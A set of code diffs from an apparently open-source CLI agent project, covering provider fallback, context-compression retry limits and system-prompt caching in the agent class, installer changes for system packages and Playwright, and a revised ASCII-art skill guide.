Example: [{"role": "user", "content": "Hi!"}, {"role": "assistant", "content": "Hello!"}]
@@ -253,13 +254,7 @@ class AIAgent:
self.provider = "openai-codex"
else:
self.api_mode = "chat_completions"
if base_url and "api.anthropic.com" in base_url.strip().lower():
raise ValueError(
"Anthropic's native /v1/messages API is not supported yet (planned for a future release). "
"Hermes currently requires OpenAI-compatible /chat/completions endpoints. "
"To use Claude models now, route through OpenRouter (OPENROUTER_API_KEY) "
"or any OpenAI-compatible proxy that wraps the Anthropic API."
)
self.tool_progress_callback = tool_progress_callback
self.clarify_callback = clarify_callback
self.step_callback = step_callback
@@ -287,7 +282,7 @@ class AIAgent:
# Model response configuration
self.max_tokens = max_tokens # None = use model default
self.reasoning_config = reasoning_config # None = use default (xhigh for OpenRouter)
self.reasoning_config = reasoning_config # None = use default (medium for OpenRouter)
self.prefill_messages = prefill_messages or [] # Prefilled conversation turns
# Anthropic prompt caching: auto-enabled for Claude models via OpenRouter.
@@ -389,6 +384,12 @@ class AIAgent:
"X-OpenRouter-Title": "Hermes Agent",
"X-OpenRouter-Categories": "productivity,cli-agent",
}
elif "api.kimi.com" in effective_base.lower():
# Kimi Code API requires a recognized coding-agent User-Agent
# (see https://github.com/MoonshotAI/kimi-cli)
client_kwargs["default_headers"] = {
"User-Agent": "KimiCLI/1.0",
}
self._client_kwargs = client_kwargs # stored for rebuilding after interrupt
try:
@@ -406,6 +407,17 @@ class AIAgent:
except Exception as e:
raise RuntimeError(f"Failed to initialize OpenAI client: {e}")
# Provider fallback — a single backup model/provider tried when the
# primary is exhausted (rate-limit, overload, connection failure).
# Config shape: {"provider": "openrouter", "model": "anthropic/claude-sonnet-4"}
self._fallback_model = fallback_model if isinstance(fallback_model, dict) else None
self._fallback_activated = False
if self._fallback_model:
fb_p = self._fallback_model.get("provider", "")
fb_m = self._fallback_model.get("model", "")
if fb_p and fb_m and not self.quiet_mode:
print(f"🔄 Fallback model: {fb_m} ({fb_p})")
# Get available tools with filtering
self.tools = get_tool_definitions(
enabled_toolsets=enabled_toolsets,
@@ -2146,6 +2158,141 @@ class AIAgent:
raise result["error"]
return result["response"]
# ── Provider fallback ──────────────────────────────────────────────────
# API-key providers: provider → (base_url, [env_var_names])
_FALLBACK_API_KEY_PROVIDERS = {
"openrouter": (OPENROUTER_BASE_URL, ["OPENROUTER_API_KEY"]),
"zai": ("https://api.z.ai/api/paas/v4", ["ZAI_API_KEY", "Z_AI_API_KEY"]),
"kimi-coding": ("https://api.moonshot.ai/v1", ["KIMI_API_KEY"]),
"minimax": ("https://api.minimax.io/v1", ["MINIMAX_API_KEY"]),
"minimax-cn": ("https://api.minimaxi.com/v1", ["MINIMAX_CN_API_KEY"]),
}
# OAuth providers: provider → (resolver_import_path, api_mode)
# Each resolver returns {"api_key": ..., "base_url": ...}.
_FALLBACK_OAUTH_PROVIDERS = {
"openai-codex": ("resolve_codex_runtime_credentials", "codex_responses"),
"nous": ("resolve_nous_runtime_credentials", "chat_completions"),
}
def _resolve_fallback_credentials(
self, fb_provider: str, fb_config: dict
) -> Optional[tuple]:
"""Resolve credentials for a fallback provider.
Returns (api_key, base_url, api_mode) on success, or None on failure.
Handles three cases:
1. OAuth providers (openai-codex, nous) — call credential resolver
2. API-key providers (openrouter, zai, etc.) — read env var
3. Custom endpoints — use base_url + api_key_env from config
"""
# ── 1. OAuth providers ────────────────────────────────────────
if fb_provider in self._FALLBACK_OAUTH_PROVIDERS:
resolver_name, api_mode = self._FALLBACK_OAUTH_PROVIDERS[fb_provider]
try:
import hermes_cli.auth as _auth
resolver = getattr(_auth, resolver_name)
creds = resolver()
return creds["api_key"], creds["base_url"], api_mode
except Exception as e:
logging.warning(
"Fallback to %s failed (credential resolution): %s",
fb_provider, e,
)
return None
# ── 2. API-key providers ──────────────────────────────────────
fb_key = (fb_config.get("api_key") or "").strip()
if not fb_key:
key_env = (fb_config.get("api_key_env") or "").strip()
if key_env:
fb_key = os.getenv(key_env, "")
elif fb_provider in self._FALLBACK_API_KEY_PROVIDERS:
for env_var in self._FALLBACK_API_KEY_PROVIDERS[fb_provider][1]:
fb_key = os.getenv(env_var, "")
if fb_key:
break
if not fb_key:
logging.warning(
"Fallback model configured but no API key found for provider '%s'",
fb_provider,
)
return None
# ── 3. Resolve base URL ───────────────────────────────────────
fb_base_url = (fb_config.get("base_url") or "").strip()
if not fb_base_url and fb_provider in self._FALLBACK_API_KEY_PROVIDERS:
fb_base_url = self._FALLBACK_API_KEY_PROVIDERS[fb_provider][0]
if not fb_base_url:
fb_base_url = OPENROUTER_BASE_URL
return fb_key, fb_base_url, "chat_completions"
def _try_activate_fallback(self) -> bool:
"""Switch to the configured fallback model/provider.
Called when the primary model is failing after retries. Swaps the
OpenAI client, model slug, and provider in-place so the retry loop
can continue with the new backend. One-shot: returns False if
already activated or not configured.
"""
if self._fallback_activated or not self._fallback_model:
return False
fb = self._fallback_model
fb_provider = (fb.get("provider") or "").strip().lower()
fb_model = (fb.get("model") or "").strip()
if not fb_provider or not fb_model:
return False
resolved = self._resolve_fallback_credentials(fb_provider, fb)
if resolved is None:
return False
fb_key, fb_base_url, fb_api_mode = resolved
# Build new client
try:
client_kwargs = {"api_key": fb_key, "base_url": fb_base_url}
if "openrouter" in fb_base_url.lower():
client_kwargs["default_headers"] = {
"HTTP-Referer": "https://github.com/NousResearch/hermes-agent",
"X-OpenRouter-Title": "Hermes Agent",
"X-OpenRouter-Categories": "productivity,cli-agent",
}
elif "api.kimi.com" in fb_base_url.lower():
client_kwargs["default_headers"] = {"User-Agent": "KimiCLI/1.0"}
self.client = OpenAI(**client_kwargs)
self._client_kwargs = client_kwargs
old_model = self.model
self.model = fb_model
self.provider = fb_provider
self.base_url = fb_base_url
self.api_mode = fb_api_mode
self._fallback_activated = True
# Re-evaluate prompt caching for the new provider/model
self._use_prompt_caching = (
"openrouter" in fb_base_url.lower()
and "claude" in fb_model.lower()
)
print(
f"{self.log_prefix}🔄 Primary model failed — switching to fallback: "
f"{fb_model} via {fb_provider}"
)
logging.info(
"Fallback activated: %s%s (%s)",
old_model, fb_model, fb_provider,
)
return True
except Exception as e:
logging.error("Failed to activate fallback model: %s", e)
return False
# ── End provider fallback ──────────────────────────────────────────────
def _build_api_kwargs(self, api_messages: list) -> dict:
"""Build the keyword arguments dict for the active API mode."""
if self.api_mode == "codex_responses":
@@ -2157,8 +2304,8 @@ class AIAgent:
if not instructions:
instructions = DEFAULT_AGENT_IDENTITY
# Resolve reasoning effort: config > default (xhigh)
reasoning_effort = "xhigh"
# Resolve reasoning effort: config > default (medium)
reasoning_effort = "medium"
reasoning_enabled = True
if self.reasoning_config and isinstance(self.reasoning_config, dict):
if self.reasoning_config.get("enabled") is False:
@@ -2224,7 +2371,7 @@ class AIAgent:
else:
extra_body["reasoning"] = {
"enabled": True,
"effort": "xhigh"
"effort": "medium"
}
# Nous Portal product attribution
@@ -2484,6 +2631,8 @@ class AIAgent:
if self._session_db:
try:
# Propagate title to the new session with auto-numbering
old_title = self._session_db.get_session_title(self.session_id)
self._session_db.end_session(self.session_id, "compression")
old_session_id = self.session_id
self.session_id = f"{datetime.now().strftime('%Y%m%d_%H%M%S')}_{uuid.uuid4().hex[:6]}"
@@ -2493,6 +2642,13 @@ class AIAgent:
model=self.model,
parent_session_id=old_session_id,
)
# Auto-number the title for the continuation session
if old_title:
try:
new_title = self._session_db.get_next_title_in_lineage(old_title)
self._session_db.set_session_title(self.session_id, new_title)
except (ValueError, Exception) as e:
logger.debug("Could not propagate title on compression: %s", e)
self._session_db.update_system_prompt(self.session_id, new_system_prompt)
except Exception as e:
logger.debug("Session DB compression split failed: %s", e)
@@ -2510,9 +2666,10 @@ class AIAgent:
if remaining_calls:
print(f"{self.log_prefix}⚡ Interrupt: skipping {len(remaining_calls)} tool call(s)")
for skipped_tc in remaining_calls:
skipped_name = skipped_tc.function.name
skip_msg = {
"role": "tool",
"content": "[Tool execution cancelled - user interrupted]",
"content": f"[Tool execution cancelled {skipped_name} was skipped due to user interrupt]",
"tool_call_id": skipped_tc.id,
}
messages.append(skip_msg)
@@ -2619,7 +2776,6 @@ class AIAgent:
context=function_args.get("context"),
toolsets=function_args.get("toolsets"),
tasks=tasks_arg,
model=function_args.get("model"),
max_iterations=function_args.get("max_iterations"),
parent_agent=self,
)
@@ -2716,9 +2872,10 @@ class AIAgent:
remaining = len(assistant_message.tool_calls) - i
print(f"{self.log_prefix}⚡ Interrupt: skipping {remaining} remaining tool call(s)")
for skipped_tc in assistant_message.tool_calls[i:]:
skipped_name = skipped_tc.function.name
skip_msg = {
"role": "tool",
"content": "[Tool execution skipped - user sent a new message]",
"content": f"[Tool execution skipped {skipped_name} was not started. User sent a new message]",
"tool_call_id": skipped_tc.id
}
messages.append(skip_msg)
@@ -2768,7 +2925,7 @@ class AIAgent:
else:
summary_extra_body["reasoning"] = {
"enabled": True,
"effort": "xhigh"
"effort": "medium"
}
if _is_nous:
summary_extra_body["tags"] = ["product=hermes-agent"]
@@ -2880,13 +3037,15 @@ class AIAgent:
# Generate unique task_id if not provided to isolate VMs between concurrent tasks
effective_task_id = task_id or str(uuid.uuid4())
# Reset retry counters at the start of each conversation to prevent state leakage
# Reset retry counters and iteration budget at the start of each turn
# so subagent usage from a previous turn doesn't eat into the next one.
self._invalid_tool_retries = 0
self._invalid_json_retries = 0
self._empty_content_retries = 0
self._last_content_with_tools = None
self._turns_since_memory = 0
self._iters_since_skill = 0
self.iteration_budget = IterationBudget(self.max_iterations)
# Initialize conversation (copy to avoid mutating the caller's list)
messages = list(conversation_history) if conversation_history else []
@@ -2933,9 +3092,14 @@ class AIAgent:
)
self._iters_since_skill = 0
# Honcho prefetch: retrieve user context for system prompt injection
# Honcho prefetch: retrieve user context for system prompt injection.
# Only on the FIRST turn of a session (empty history). On subsequent
# turns the model already has all prior context in its conversation
# history, and the Honcho context is baked into the stored system
# prompt — re-fetching it would change the system message and break
# Anthropic prompt caching.
self._honcho_context = ""
if self._honcho and self._honcho_session_key:
if self._honcho and self._honcho_session_key and not conversation_history:
try:
self._honcho_context = self._honcho_prefetch(user_message)
except Exception as e:
@@ -2953,14 +3117,42 @@ class AIAgent:
# Built once on first call, reused for all subsequent calls.
# Only rebuilt after context compression events (which invalidate
# the cache and reload memory from disk).
#
# For continuing sessions (gateway creates a fresh AIAgent per
# message), we load the stored system prompt from the session DB
# instead of rebuilding. Rebuilding would pick up memory changes
# from disk that the model already knows about (it wrote them!),
# producing a different system prompt and breaking the Anthropic
# prefix cache.
if self._cached_system_prompt is None:
self._cached_system_prompt = self._build_system_prompt(system_message)
# Store the system prompt snapshot in SQLite
if self._session_db:
stored_prompt = None
if conversation_history and self._session_db:
try:
self._session_db.update_system_prompt(self.session_id, self._cached_system_prompt)
except Exception as e:
logger.debug("Session DB update_system_prompt failed: %s", e)
session_row = self._session_db.get_session(self.session_id)
if session_row:
stored_prompt = session_row.get("system_prompt") or None
except Exception:
pass # Fall through to build fresh
if stored_prompt:
# Continuing session — reuse the exact system prompt from
# the previous turn so the Anthropic cache prefix matches.
self._cached_system_prompt = stored_prompt
else:
# First turn of a new session — build from scratch.
self._cached_system_prompt = self._build_system_prompt(system_message)
# Bake Honcho context into the prompt so it's stable for
# the entire session (not re-fetched per turn).
if self._honcho_context:
self._cached_system_prompt = (
self._cached_system_prompt + "\n\n" + self._honcho_context
).strip()
# Store the system prompt snapshot in SQLite
if self._session_db:
try:
self._session_db.update_system_prompt(self.session_id, self._cached_system_prompt)
except Exception as e:
logger.debug("Session DB update_system_prompt failed: %s", e)
active_system_prompt = self._cached_system_prompt
@@ -3085,11 +3277,13 @@ class AIAgent:
# Build the final system message: cached prompt + ephemeral system prompt.
# The ephemeral part is appended here (not baked into the cached prompt)
# so it stays out of the session DB and logs.
# Note: Honcho context is baked into _cached_system_prompt on the first
# turn and stored in the session DB, so it does NOT need to be injected
# here. This keeps the system message identical across all turns in a
# session, maximizing Anthropic prompt cache hits.
effective_system = active_system_prompt or ""
if self.ephemeral_system_prompt:
effective_system = (effective_system + "\n\n" + self.ephemeral_system_prompt).strip()
if self._honcho_context:
effective_system = (effective_system + "\n\n" + self._honcho_context).strip()
if effective_system:
api_messages = [{"role": "system", "content": effective_system}] + api_messages
@@ -3142,10 +3336,13 @@ class AIAgent:
api_start_time = time.time()
retry_count = 0
max_retries = 6 # Increased to allow longer backoff periods
compression_attempts = 0
max_compression_attempts = 3
codex_auth_retry_attempted = False
nous_auth_retry_attempted = False
finish_reason = "stop"
response = None # Guard against UnboundLocalError if all retries fail
while retry_count < max_retries:
try:
@@ -3237,6 +3434,10 @@ class AIAgent:
print(f"{self.log_prefix} ⏱️ Response time: {api_duration:.2f}s (fast response often indicates rate limiting)")
if retry_count >= max_retries:
# Try fallback before giving up
if self._try_activate_fallback():
retry_count = 0
continue
print(f"{self.log_prefix}❌ Max retries ({max_retries}) exceeded for invalid responses. Giving up.")
logging.error(f"{self.log_prefix}Invalid API response after {max_retries} retries.")
self._persist_session(messages, conversation_history)
@@ -3261,7 +3462,7 @@ class AIAgent:
self._persist_session(messages, conversation_history)
self.clear_interrupt()
return {
"final_response": "Operation interrupted.",
"final_response": f"Operation interrupted: retrying API call after rate limit (retry {retry_count}/{max_retries}).",
"messages": messages,
"api_calls": api_call_count,
"completed": False,
@@ -3370,10 +3571,11 @@ class AIAgent:
if thinking_spinner:
thinking_spinner.stop("")
thinking_spinner = None
api_elapsed = time.time() - api_start_time
print(f"{self.log_prefix}⚡ Interrupted during API call.")
self._persist_session(messages, conversation_history)
interrupted = True
final_response = "Operation interrupted."
final_response = f"Operation interrupted: waiting for model response ({api_elapsed:.1f}s elapsed)."
break
except Exception as api_error:
@@ -3422,7 +3624,7 @@ class AIAgent:
self._persist_session(messages, conversation_history)
self.clear_interrupt()
return {
"final_response": "Operation interrupted.",
"final_response": f"Operation interrupted: handling API error ({error_type}: {str(api_error)[:80]}).",
"messages": messages,
"api_calls": api_call_count,
"completed": False,
@@ -3441,7 +3643,19 @@ class AIAgent:
)
if is_payload_too_large:
print(f"{self.log_prefix}⚠️ Request payload too large (413) - attempting compression...")
compression_attempts += 1
if compression_attempts > max_compression_attempts:
print(f"{self.log_prefix}❌ Max compression attempts ({max_compression_attempts}) reached for payload-too-large error.")
logging.error(f"{self.log_prefix}413 compression failed after {max_compression_attempts} attempts.")
self._persist_session(messages, conversation_history)
return {
"messages": messages,
"completed": False,
"api_calls": api_call_count,
"error": f"Request payload too large: max compression attempts ({max_compression_attempts}) reached.",
"partial": True
}
print(f"{self.log_prefix}⚠️ Request payload too large (413) — compression attempt {compression_attempts}/{max_compression_attempts}...")
original_len = len(messages)
messages, active_system_prompt = self._compress_context(
@@ -3450,6 +3664,7 @@ class AIAgent:
if len(messages) < original_len:
print(f"{self.log_prefix} 🗜️ Compressed {original_len}{len(messages)} messages, retrying...")
time.sleep(2) # Brief pause between compression retries
continue # Retry with compressed messages
else:
print(f"{self.log_prefix}❌ Payload too large and cannot compress further.")
@@ -3495,6 +3710,20 @@ class AIAgent:
else:
print(f"{self.log_prefix}⚠️ Context length exceeded at minimum tier — attempting compression...")
compression_attempts += 1
if compression_attempts > max_compression_attempts:
print(f"{self.log_prefix}❌ Max compression attempts ({max_compression_attempts}) reached.")
logging.error(f"{self.log_prefix}Context compression failed after {max_compression_attempts} attempts.")
self._persist_session(messages, conversation_history)
return {
"messages": messages,
"completed": False,
"api_calls": api_call_count,
"error": f"Context length exceeded: max compression attempts ({max_compression_attempts}) reached.",
"partial": True
}
print(f"{self.log_prefix} 🗜️ Context compression attempt {compression_attempts}/{max_compression_attempts}...")
original_len = len(messages)
messages, active_system_prompt = self._compress_context(
messages, system_message, approx_tokens=approx_tokens
@@ -3503,6 +3732,7 @@ class AIAgent:
if len(messages) < original_len or new_ctx and new_ctx < old_ctx:
if len(messages) < original_len:
print(f"{self.log_prefix} 🗜️ Compressed {original_len}{len(messages)} messages, retrying...")
time.sleep(2) # Brief pause between compression retries
continue # Retry with compressed messages or new tier
else:
# Can't compress further and already at minimum tier
@@ -3532,6 +3762,11 @@ class AIAgent:
])) and not is_context_length_error
if is_client_error:
# Try fallback before aborting — a different provider
# may not have the same issue (rate limit, auth, etc.)
if self._try_activate_fallback():
retry_count = 0
continue
self._dump_api_request_debug(
api_kwargs, reason="non_retryable_client_error", error=api_error,
)
@@ -3549,6 +3784,10 @@ class AIAgent:
}
if retry_count >= max_retries:
# Try fallback before giving up entirely
if self._try_activate_fallback():
retry_count = 0
continue
print(f"{self.log_prefix}❌ Max retries ({max_retries}) exceeded. Giving up.")
logging.error(f"{self.log_prefix}API call failed after {max_retries} retries. Last error: {api_error}")
logging.error(f"{self.log_prefix}Request details - Messages: {len(api_messages)}, Approx tokens: {approx_tokens:,}")
@@ -3569,7 +3808,7 @@ class AIAgent:
self._persist_session(messages, conversation_history)
self.clear_interrupt()
return {
"final_response": "Operation interrupted.",
"final_response": f"Operation interrupted: retrying API call after error (retry {retry_count}/{max_retries}).",
"messages": messages,
"api_calls": api_call_count,
"completed": False,
@@ -3581,12 +3820,41 @@ class AIAgent:
if interrupted:
break
# Guard: if all retries exhausted without a successful response
# (e.g. repeated context-length errors that exhausted retry_count),
# the `response` variable is still None. Break out cleanly.
if response is None:
print(f"{self.log_prefix}❌ All API retries exhausted with no successful response.")
self._persist_session(messages, conversation_history)
break
try:
if self.api_mode == "codex_responses":
assistant_message, finish_reason = self._normalize_codex_response(response)
else:
assistant_message = response.choices[0].message
# Normalize content to string — some OpenAI-compatible servers
# (llama-server, etc.) return content as a dict or list instead
# of a plain string, which crashes downstream .strip() calls.
if assistant_message.content is not None and not isinstance(assistant_message.content, str):
raw = assistant_message.content
if isinstance(raw, dict):
assistant_message.content = raw.get("text", "") or raw.get("content", "") or json.dumps(raw)
elif isinstance(raw, list):
# Multimodal content list — extract text parts
parts = []
for part in raw:
if isinstance(part, str):
parts.append(part)
elif isinstance(part, dict) and part.get("type") == "text":
parts.append(part.get("text", ""))
elif isinstance(part, dict) and "text" in part:
parts.append(str(part["text"]))
assistant_message.content = "\n".join(parts)
else:
assistant_message.content = str(raw)
# Handle assistant response
if assistant_message.content and not self.quiet_mode:
print(f"{self.log_prefix}🤖 Assistant: {assistant_message.content[:100]}{'...' if len(assistant_message.content) > 100 else ''}")
@@ -4006,7 +4274,12 @@ class AIAgent:
final_response = f"I apologize, but I encountered repeated errors: {error_msg}"
break
if api_call_count >= self.max_iterations and final_response is None:
if final_response is None and (
api_call_count >= self.max_iterations
or self.iteration_budget.remaining <= 0
):
if self.iteration_budget.remaining <= 0 and not self.quiet_mode:
print(f"\n⚠️ Session iteration budget exhausted ({self.iteration_budget.used}/{self.iteration_budget.max_total} used, including subagents)")
final_response = self._handle_max_iterations(messages, api_call_count)
# Determine if conversation completed successfully
@@ -4077,7 +4350,7 @@ def main(
Args:
query (str): Natural language query for the agent. Defaults to Python 3.13 example.
model (str): Model name to use (OpenRouter format: provider/model). Defaults to anthropic/claude-sonnet-4-20250514.
model (str): Model name to use (OpenRouter format: provider/model). Defaults to anthropic/claude-sonnet-4.6.
api_key (str): API key for authentication. Uses OPENROUTER_API_KEY env var if not provided.
base_url (str): Base URL for the model API. Defaults to https://openrouter.ai/api/v1
max_turns (int): Maximum number of API call iterations. Defaults to 10.

View File

@@ -492,9 +492,23 @@ install_system_packages() {
return 0
fi
fi
elif [ -e /dev/tty ]; then
# Non-interactive (e.g. curl | bash) but a terminal is available.
# Read the prompt from /dev/tty (same approach the setup wizard uses).
echo ""
log_info "Installing ${description} requires sudo."
read -p "Install? [Y/n] " -n 1 -r < /dev/tty
echo
if [[ $REPLY =~ ^[Yy]$ ]] || [[ -z $REPLY ]]; then
if sudo DEBIAN_FRONTEND=noninteractive NEEDRESTART_MODE=a $install_cmd < /dev/tty; then
[ "$need_ripgrep" = true ] && HAS_RIPGREP=true && log_success "ripgrep installed"
[ "$need_ffmpeg" = true ] && HAS_FFMPEG=true && log_success "ffmpeg installed"
return 0
fi
fi
else
log_warn "Non-interactive mode: cannot prompt for sudo password"
log_info "Install missing packages manually: sudo $install_cmd"
log_warn "Non-interactive mode and no terminal available — cannot install system packages"
log_info "Install manually after setup completes: sudo $install_cmd"
fi
fi
fi
@@ -829,6 +843,33 @@ install_node_deps() {
log_warn "npm install failed (browser tools may not work)"
}
log_success "Node.js dependencies installed"
# Install Playwright browser + system dependencies.
# Playwright's install-deps only supports apt/dnf/zypper natively.
# For Arch/Manjaro we install the system libs via pacman first.
log_info "Installing browser engine (Playwright Chromium)..."
case "$DISTRO" in
arch|manjaro)
if command -v pacman &> /dev/null; then
log_info "Arch/Manjaro detected — installing Chromium system dependencies via pacman..."
if command -v sudo &> /dev/null && sudo -n true 2>/dev/null; then
sudo NEEDRESTART_MODE=a pacman -S --noconfirm --needed \
nss atk at-spi2-core cups libdrm libxkbcommon mesa pango cairo alsa-lib >/dev/null 2>&1 || true
elif [ "$(id -u)" -eq 0 ]; then
pacman -S --noconfirm --needed \
nss atk at-spi2-core cups libdrm libxkbcommon mesa pango cairo alsa-lib >/dev/null 2>&1 || true
else
log_warn "Cannot install browser deps without sudo. Run manually:"
log_warn " sudo pacman -S nss atk at-spi2-core cups libdrm libxkbcommon mesa pango cairo alsa-lib"
fi
fi
cd "$INSTALL_DIR" && npx playwright install chromium 2>/dev/null || true
;;
*)
cd "$INSTALL_DIR" && npx playwright install --with-deps chromium 2>/dev/null || true
;;
esac
log_success "Browser engine installed"
fi
# Install WhatsApp bridge dependencies

View File

@@ -0,0 +1,3 @@
---
description: Creative content generation — ASCII art, hand-drawn style diagrams, and visual design tools.
---

View File

@@ -1,7 +1,7 @@
---
name: ascii-art
description: Generate ASCII art using pyfiglet (571 fonts), cowsay, boxes, toilet, image-to-ascii conversion, and search curated art from emojicombos.com and asciiart.eu (11,000+ artworks). Falls back to LLM-generated art.
version: 3.1.0
description: Generate ASCII art using pyfiglet (571 fonts), cowsay, boxes, toilet, image-to-ascii, remote APIs (asciified, ascii.co.uk), and LLM fallback. No API keys required.
version: 4.0.0
author: 0xbyt4, Hermes Agent
license: MIT
dependencies: []
@@ -14,9 +14,9 @@ metadata:
# ASCII Art Skill
Multiple tools for different ASCII art needs. All tools are local CLI programs — no API keys required.
Multiple tools for different ASCII art needs. All tools are local CLI programs or free REST APIs — no API keys required.
## Tool 1: Text Banners (pyfiglet)
## Tool 1: Text Banners (pyfiglet — local)
Render text as large ASCII art banners. 571 built-in fonts.
@@ -53,7 +53,35 @@ python3 -m pyfiglet --list_fonts # List all 571 fonts
- Short text (1-8 chars) works best with detailed fonts like `doom` or `block`
- Long text works better with compact fonts like `small` or `mini`
## Tool 2: Cowsay (Message Art)
## Tool 2: Text Banners (asciified API — remote, no install)
Free REST API that converts text to ASCII art. 250+ FIGlet fonts. Returns plain text directly — no parsing needed. Use this when pyfiglet is not installed or as a quick alternative.
### Usage (via terminal curl)
```bash
# Basic text banner (default font)
curl -s "https://asciified.thelicato.io/api/v2/ascii?text=Hello+World"
# With a specific font
curl -s "https://asciified.thelicato.io/api/v2/ascii?text=Hello&font=Slant"
curl -s "https://asciified.thelicato.io/api/v2/ascii?text=Hello&font=Doom"
curl -s "https://asciified.thelicato.io/api/v2/ascii?text=Hello&font=Star+Wars"
curl -s "https://asciified.thelicato.io/api/v2/ascii?text=Hello&font=3-D"
curl -s "https://asciified.thelicato.io/api/v2/ascii?text=Hello&font=Banner3"
# List all available fonts (returns JSON array)
curl -s "https://asciified.thelicato.io/api/v2/fonts"
```
### Tips
- URL-encode spaces as `+` in the text parameter
- The response is plain text ASCII art — no JSON wrapping, ready to display
- Font names are case-sensitive; use the fonts endpoint to get exact names
- Works from any terminal with curl — no Python or pip needed
## Tool 3: Cowsay (Message Art)
Classic tool that wraps text in a speech bubble with an ASCII character.
@@ -97,7 +125,7 @@ cowsay -e "OO" "Msg" # Custom eyes
cowsay -T "U " "Msg" # Custom tongue
```
## Tool 3: Boxes (Decorative Borders)
## Tool 4: Boxes (Decorative Borders)
Draw decorative ASCII art borders/frames around any text. 70+ built-in designs.
@@ -124,13 +152,15 @@ echo "Hello World" | boxes -a c # Center text
boxes -l # List all 70+ designs
```
### Combine with pyfiglet
### Combine with pyfiglet or asciified
```bash
python3 -m pyfiglet "HERMES" -f slant | boxes -d stone
# Or without pyfiglet installed:
curl -s "https://asciified.thelicato.io/api/v2/ascii?text=HERMES&font=Slant" | boxes -d stone
```
## Tool 4: TOIlet (Colored Text Art)
## Tool 5: TOIlet (Colored Text Art)
Like pyfiglet but with ANSI color effects and visual filters. Great for terminal eye candy.
@@ -160,14 +190,14 @@ toilet -F list # List available filters
**Note**: toilet outputs ANSI escape codes for colors — works in terminals but may not render in all contexts (e.g., plain text files, some chat platforms).
## Tool 5: Image to ASCII Art
## Tool 6: Image to ASCII Art
Convert images (PNG, JPEG, GIF, WEBP) to ASCII art.
### Option A: ascii-image-converter (recommended, modern)
```bash
# Install via snap or Go
# Install
sudo snap install ascii-image-converter
# OR: go install github.com/TheZoraiz/ascii-image-converter@latest
```
@@ -190,63 +220,77 @@ jp2a --width=80 image.jpg
jp2a --colors image.jpg # Colorized
```
## Tool 6: Search Pre-Made ASCII Art (Web APIs)
## Tool 7: Search Pre-Made ASCII Art
Search curated ASCII art databases via `web_extract`. No API keys needed.
Search curated ASCII art from the web. Use `terminal` with `curl`.
### Source A: emojicombos.com (recommended first)
### Source A: ascii.co.uk (recommended for pre-made art)
Huge collection of ASCII art, dot art, kaomoji, and emoji combos. Modern, meme-aware, user-submitted content. Great for pop culture, animals, objects, aesthetics.
Large collection of classic ASCII art organized by subject. Art is inside HTML `<pre>` tags. Fetch the page with curl, then extract art with a small Python snippet.
**URL pattern:** `https://emojicombos.com/{term}-ascii-art`
**URL pattern:** `https://ascii.co.uk/art/{subject}`
**Step 1 — Fetch the page:**
```bash
curl -s 'https://ascii.co.uk/art/cat' -o /tmp/ascii_art.html
```
web_extract(urls=["https://emojicombos.com/cat-ascii-art"])
web_extract(urls=["https://emojicombos.com/rocket-ascii-art"])
web_extract(urls=["https://emojicombos.com/dragon-ascii-art"])
web_extract(urls=["https://emojicombos.com/skull-ascii-art"])
web_extract(urls=["https://emojicombos.com/heart-ascii-art"])
**Step 2 — Extract art from pre tags:**
```python
import re, html
with open('/tmp/ascii_art.html') as f:
text = f.read()
arts = re.findall(r'<pre[^>]*>(.*?)</pre>', text, re.DOTALL)
for art in arts:
clean = re.sub(r'<[^>]+>', '', art)
clean = html.unescape(clean).strip()
if len(clean) > 30:
print(clean)
print('\n---\n')
```
**Available subjects** (use as URL path):
- Animals: `cat`, `dog`, `horse`, `bird`, `fish`, `dragon`, `snake`, `rabbit`, `elephant`, `dolphin`, `butterfly`, `owl`, `wolf`, `bear`, `penguin`, `turtle`
- Objects: `car`, `ship`, `airplane`, `rocket`, `guitar`, `computer`, `coffee`, `beer`, `cake`, `house`, `castle`, `sword`, `crown`, `key`
- Nature: `tree`, `flower`, `sun`, `moon`, `star`, `mountain`, `ocean`, `rainbow`
- Characters: `skull`, `robot`, `angel`, `wizard`, `pirate`, `ninja`, `alien`
- Holidays: `christmas`, `halloween`, `valentine`
**Tips:**
- Use hyphenated search terms: `hello-kitty-ascii-art`, `star-wars-ascii-art`
- Returns a mix of classic ASCII, Braille dot art, and kaomoji — pick the best style for the user
- Includes modern meme art and pop culture references
- Great for kaomoji/emoticons too: `https://emojicombos.com/cat-kaomoji`
- Preserve artist signatures/initials — important etiquette
- Multiple art pieces per page — pick the best one for the user
- Works reliably via curl, no JavaScript needed
### Source B: asciiart.eu (classic archive)
### Source B: GitHub Octocat API (fun easter egg)
11,000+ classic ASCII artworks organized by category. More traditional/vintage art.
**Browse by category** (use as URL paths):
- `animals/cats`, `animals/dogs`, `animals/birds`, `animals/horses`
- `animals/dolphins`, `animals/dragons`, `animals/insects`
- `space/rockets`, `space/stars`, `space/planets`
- `vehicles/cars`, `vehicles/ships`, `vehicles/airplanes`
- `food-and-drinks/coffee`, `food-and-drinks/beer`
- `computers/computers`, `electronics/robots`
- `art-and-design/hearts`, `art-and-design/skulls`
- `plants/flowers`, `plants/trees`
- `mythology/dragons`, `mythology/unicorns`
```
web_extract(urls=["https://www.asciiart.eu/animals/cats"])
web_extract(urls=["https://www.asciiart.eu/search?q=rocket"])
```
**Tips:**
- Preserve artist initials/signatures (e.g., `jgs`, `hjw`) — this is important etiquette
- Better for classic/vintage ASCII art style
### Source C: GitHub Octocat API (fun easter egg)
Returns a random GitHub Octocat with a quote. No auth needed.
Returns a random GitHub Octocat with a wise quote. No auth needed.
```bash
curl -s https://api.github.com/octocat
```
## Tool 7: LLM-Generated Custom Art (Fallback)
## Tool 8: Fun ASCII Utilities (via curl)
These free services return ASCII art directly — great for fun extras.
### QR Codes as ASCII Art
```bash
curl -s "qrenco.de/Hello+World"
curl -s "qrenco.de/https://example.com"
```
### Weather as ASCII Art
```bash
curl -s "wttr.in/London" # Full weather report with ASCII graphics
curl -s "wttr.in/Moon" # Moon phase in ASCII art
curl -s "v2.wttr.in/London" # Detailed version
```
## Tool 9: LLM-Generated Custom Art (Fallback)
When tools above don't have what's needed, generate ASCII art directly using these Unicode characters:
@@ -264,28 +308,14 @@ When tools above don't have what's needed, generate ASCII art directly using the
- Max height: 15 lines for banners, 25 for scenes
- Monospace only: output must render correctly in fixed-width fonts
## Fun Extras
### Star Wars in ASCII (via telnet)
```bash
telnet towel.blinkenlights.nl
```
### Useful Resources
- [asciiart.eu](https://www.asciiart.eu/) — 11,000+ artworks, searchable
- [patorjk.com/software/taag](http://patorjk.com/software/taag/) — Web-based text-to-ASCII with font preview
